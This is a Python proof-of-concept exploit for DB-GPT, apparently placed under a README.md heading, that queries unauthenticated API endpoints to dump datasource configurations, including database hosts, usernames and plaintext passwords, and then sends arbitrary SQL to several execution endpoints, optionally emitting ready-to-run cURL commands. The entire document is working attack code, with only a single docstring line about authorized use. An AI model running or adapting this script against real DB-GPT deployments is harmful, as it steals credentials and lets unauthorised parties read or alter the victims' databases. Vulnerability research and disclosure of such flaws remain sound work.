# README.md
# Rendering markdown...
import requests
import json
import urllib3
import argparse
import sys
# The HTTP calls in this script pass verify=False, so silence the
# InsecureRequestWarning that urllib3 would otherwise print for each request.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def banner():
    """Print the tool's ASCII-art title followed by its one-line description."""
    # Raw string so the backslashes in the art are emitted literally.
    title_art = r"""
____ ____ ________ ____ ______ ____ ____ ______
/ __ \/ __ )/ ____/ |/ / |/ / _/ / __ \/ __ \/ ____/
/ / / / __ / / __/ /|_/ / /|_/ // / / /_/ / / / / /
/ /_/ / /_/ / /_/ / / / / / / // / / ____/ /_/ / /___
/_____/_____/\____/_/ /_/_/ /_/___/ /_/ \____/\____/
[+] DBGPT Unauthenticated Information Disclosure & SQL Execution PoC
"""
    print(title_art)
# Version-probe query per database family. Each key is a lowercase fragment
# that get_smart_sql() looks for inside the reported database type.
DB_QUERIES = {
    "mysql": "SELECT VERSION();",
    "postgresql": "SELECT version();",
    "postgres": "SELECT version();",
    "sqlite": "SELECT sqlite_version();",
    "oracle": "SELECT banner FROM v$version WHERE ROWNUM = 1;",
    "mssql": "SELECT @@VERSION;",
    "sqlserver": "SELECT @@VERSION;",
    "dm": "SELECT * FROM v$version;",  # Dameng DB
    "kingbase": "SELECT version();",  # Kingbase
}


def get_smart_sql(db_type, default_sql):
    """
    Pick a version query suited to the database type, unless the caller
    supplied a custom query.

    Args:
        db_type: Database type as reported by the server (any case), or a
            falsy value when unknown.
        default_sql: The query requested by the user.

    Returns:
        The matching entry of DB_QUERIES when ``default_sql`` is the stock
        ``SELECT VERSION()`` probe and ``db_type`` contains a known key;
        otherwise ``default_sql`` unchanged.
    """
    if not db_type:
        return default_sql

    # Substitute only when the whole statement is the stock probe. A plain
    # substring test would also hit custom queries that merely contain
    # "select version()" and silently throw the user's query away.
    normalized = default_sql.strip().rstrip(";").strip().lower()
    if normalized != "select version()":
        return default_sql

    db_type = str(db_type).lower()
    for key, query in DB_QUERIES.items():
        # Substring match so variants of a type name still map to the same
        # family key.
        if key in db_type:
            return query
    return default_sql
def _extract_db_info(db):
    """Map one raw datasource record onto the common result dict, or return None if it is not a JSON object."""
    if not isinstance(db, dict):
        return None

    if "params" in db:
        # Layout with connection details nested under "params". A null or
        # non-object value is treated as empty instead of raising.
        params = db.get("params")
        if not isinstance(params, dict):
            params = {}
        return {
            "id": db.get("id"),
            "type": db.get("type"),
            "name": params.get("database") or db.get("db_name"),
            "user": params.get("user"),
            "password": params.get("password"),
            "host": params.get("host"),
            "port": params.get("port"),
            "driver": params.get("driver"),
        }

    # Flat layout (structure for /api/v1/chat/db/list, alternative format).
    return {
        "id": db.get("id"),
        "type": db.get("db_type"),
        "name": db.get("db_name"),
        "user": db.get("db_user"),
        "password": db.get("db_pwd"),
        "host": db.get("db_host"),
        "port": db.get("db_port"),
        "driver": db.get("db_type"),
    }


def get_datasources(base_url):
    """
    Attempt to retrieve datasource configurations from known endpoints.

    Each endpoint is requested with GET in turn. The first one that answers
    HTTP 200 with a JSON object whose "success" is true and whose "data" is a
    non-empty list ends the search.

    Args:
        base_url: Base URL of the target; a trailing "/" is ignored.

    Returns:
        A list of dicts with the keys "id", "type", "name", "user",
        "password", "host", "port" and "driver" taken from the first
        endpoint that yields records, or an empty list if none does.
    """
    endpoints = (
        "/api/v2/serve/datasources",
        "/api/v1/chat/db/list",
        "/api/v1/editor/db/list",  # Sometimes this exists too
    )
    root = base_url.rstrip("/")

    for endpoint in endpoints:
        target_url = root + endpoint
        print(f"[*] Trying to fetch datasources from: {target_url}")

        try:
            response = requests.get(target_url, verify=False, timeout=10)
        except Exception as e:
            # Deliberately broad: probing is best-effort, so any failure of
            # the request itself just moves on to the next endpoint.
            print(f"[!] Error connecting to {target_url}: {e}")
            continue

        if response.status_code != 200:
            print(f"[-] Endpoint {endpoint} returned status code: {response.status_code}")
            continue

        try:
            data = response.json()
        except ValueError:
            # JSON decode errors are ValueError subclasses whichever JSON
            # backend requests is using.
            print(f"[-] Endpoint {endpoint} did not return valid JSON.")
            continue

        if not isinstance(data, dict) or data.get("success") is not True:
            print(f"[-] Endpoint {endpoint} returned success=false.")
            continue

        db_list = data.get("data") or []
        if not db_list:
            print(f"[-] Endpoint {endpoint} returned success but no data.")
            continue
        if not isinstance(db_list, list):
            print(f"[-] Endpoint {endpoint} returned data in an unexpected format.")
            continue

        print(f"[+] SUCCESS! Found {len(db_list)} database configurations at {endpoint}")
        records = [info for info in map(_extract_db_info, db_list) if info is not None]
        if records:
            # One working endpoint is enough; do not query the remaining ones.
            return records
        print(f"[-] Endpoint {endpoint} returned data in an unexpected format.")

    return []
def run_sql(base_url, db_name, sql_query, generate_curl=False):
    """
    Execute a SQL query through the known endpoints, or print an equivalent
    cURL command instead.

    Args:
        base_url: Base URL of the target; a trailing "/" is ignored.
        db_name: Name of the database the query is addressed to.
        sql_query: SQL text to send.
        generate_curl: When true, no request is made; a cURL command for the
            first endpoint is printed and the function returns immediately.

    Returns:
        True when a cURL command was printed or an endpoint reported
        success; False when every endpoint/payload combination failed.
    """
    root = base_url.rstrip("/")

    # If generating curl, we just use the first standard endpoint and exit.
    if generate_curl:
        import shlex  # only needed on this branch

        target_url = root + "/api/v1/editor/chart/run"
        json_payload = json.dumps({
            "db_name": db_name,
            "chart_type": "bar",
            "sql": sql_query,
        })
        print("\n[+] Generated cURL command:")
        # shlex.quote keeps the command valid for a POSIX shell even when
        # the SQL itself contains single quotes; payloads without them come
        # out single-quoted as before.
        print(
            f'curl -X POST "{target_url}" -H "Content-Type: application/json" '
            f"-d {shlex.quote(json_payload)}"
        )
        return True

    endpoints = (
        "/api/v1/editor/chart/run",  # Standard endpoint
        "/api/v1/sql/exec",  # Alternative
        "/api/v1/editor/db/run",  # Another possibility
        "/api/v2/serve/query",  # v2 API attempt
    )
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
    }
    # Request bodies tried in order against every endpoint. They do not
    # depend on the endpoint, so they are built once.
    payloads = (
        # Standard payload
        {"db_name": db_name, "chart_type": "bar", "sql": sql_query},
        # Payload with dummy chart info (sometimes required)
        {
            "db_name": db_name,
            "chart_type": "bar",
            "sql": sql_query,
            "chart_name": "test_chart",
            "chart_desc": "test_desc",
        },
        # Simplified payload for raw SQL execution endpoints
        {"db_name": db_name, "sql": sql_query},
    )
    last_attempt = len(payloads) - 1

    print(f"\n[*] Executing SQL on database '{db_name}': {sql_query}")

    for endpoint in endpoints:
        target_url = root + endpoint
        for i, payload in enumerate(payloads):
            try:
                response = requests.post(
                    target_url, json=payload, headers=headers, verify=False, timeout=15
                )
                if response.status_code != 200:
                    continue  # missing endpoint or other HTTP error: try next
                data = response.json()
            except Exception:
                # Best effort: network errors and non-JSON bodies stay quiet
                # so output is only produced for meaningful replies.
                continue

            if not isinstance(data, dict):
                continue

            if data.get("success") is True:
                # Rows are either directly under 'data' or under
                # 'data.sql_data'.
                sql_data = data.get("data") or {}
                if isinstance(sql_data, dict) and "sql_data" in sql_data:
                    sql_data = sql_data.get("sql_data") or {}
                if not isinstance(sql_data, dict):
                    continue
                # 'colunms' is a typo present in the API response; accept
                # the correct spelling too.
                columns = sql_data.get("colunms", []) or sql_data.get("columns", [])
                values = sql_data.get("values", [])
                print(f"[+] SQL Execution Successful! (Endpoint: {endpoint})")
                if columns:
                    print(f" Columns: {columns}")
                if values:
                    print(" Results:")
                    for row in values:
                        print(f" {row}")
                else:
                    print(" (No rows returned)")
                return True

            err_msg = str(data.get("err_msg") or "")
            # Only report the known backend bug, or the last payload's error
            # for this endpoint, to keep the output readable.
            if "unexpected keyword argument 'params'" in err_msg:
                print(f"[-] Server Error at {endpoint}: Backend code bug (unexpected 'params'). This is common in some DBGPT versions with PostgreSQL.")
            elif i == last_attempt:
                print(f"[-] SQL Execution Failed at {endpoint}. Message: {err_msg}")

    print("[-] All SQL execution attempts failed.")
    return False
def main():
    """
    Command-line entry point.

    Parses the arguments, lists the datasource configurations returned by
    get_datasources() (phase 1), then runs the requested SQL, or prints the
    equivalent cURL command, against either the database given with --db or
    every discovered datasource (phase 2).

    Intended for use only against systems you are authorized to test.
    """
    banner()
    examples = """
Examples:
# Basic check for DB info and version
python dbgpt_poc.py -u https://dbgpt.example.com
# Execute custom SQL
python dbgpt_poc.py -u https://dbgpt.example.com --sql "SELECT user();"
# Specify a database name if auto-detection fails
python dbgpt_poc.py -u https://dbgpt.example.com --db "target_db" --sql "SHOW TABLES;"
"""
    parser = argparse.ArgumentParser(
        description="DBGPT Vulnerability PoC",
        epilog=examples,
        # Keep the epilog's line breaks instead of re-wrapping it.
        formatter_class=argparse.RawDescriptionHelpFormatter,
    )
    parser.add_argument("-u", "--url", required=True, help="Target URL (e.g., https://dbgpt.example.com)")
    parser.add_argument("-s", "--sql", default="SELECT VERSION();", help="SQL query to execute (default: SELECT VERSION())")
    parser.add_argument("--db", help="Specific database name to use for SQL execution (optional, otherwise uses discovered DBs)")
    parser.add_argument("--curl", action="store_true", help="Generate cURL command instead of executing SQL")
    args = parser.parse_args()

    # 1. Get Datasources / Leak Info
    print("--- [ Phase 1: Information Disclosure ] ---")
    dbs = get_datasources(args.url)
    if dbs:
        print(f"\n[+] Found {len(dbs)} Database Configurations:")
        for index, db in enumerate(dbs, start=1):
            print(f"\n [{index}] Database ID: {db['id']}")
            print(f" Name : {db['name']}")
            print(f" Type : {db['type']}")
            print(f" Host : {db['host']}")
            print(f" Port : {db['port']}")
            print(f" User : {db['user']}")
            print(f" Password : {db['password']}")  # Leaked credential
    else:
        print("[-] No datasources found. Authentication might be required or endpoints patched.")

    # 2. SQL Execution
    print("\n--- [ Phase 2: SQL Execution ] ---")
    targets = []
    if args.db:
        # A user-provided database takes priority; its type is not known.
        print(f"[*] Using manually specified database: {args.db}")
        targets.append({"name": args.db, "type": "unknown"})
    elif dbs:
        print("[*] Using discovered databases for SQL execution...")
        # Keep the full records, not just names, so the type is available.
        targets = dbs

    if not targets:
        print("[-] No database targets available for SQL execution.")
        print(" Tips: Use --db <name> to manually specify a target if Information Disclosure failed.")
        return

    for target in targets:
        db_name = target['name']
        db_type = target.get('type')
        if not db_name:
            print(f"[-] Skipping target with empty name (ID: {target.get('id')})")
            continue

        # get_smart_sql() decides whether the query is adapted to the
        # database type or used as given.
        sql_to_run = get_smart_sql(db_type, args.sql)
        if not args.curl:
            print(f"\n[+] Target: {db_name} (Type: {db_type})")
            if sql_to_run != args.sql:
                print(f" -> Adapted SQL for {db_type}: {sql_to_run}")
        run_sql(args.url, db_name, sql_to_run, generate_curl=args.curl)


# Run the CLI only when the file is executed as a script, not when imported.
if __name__ == "__main__":
    main()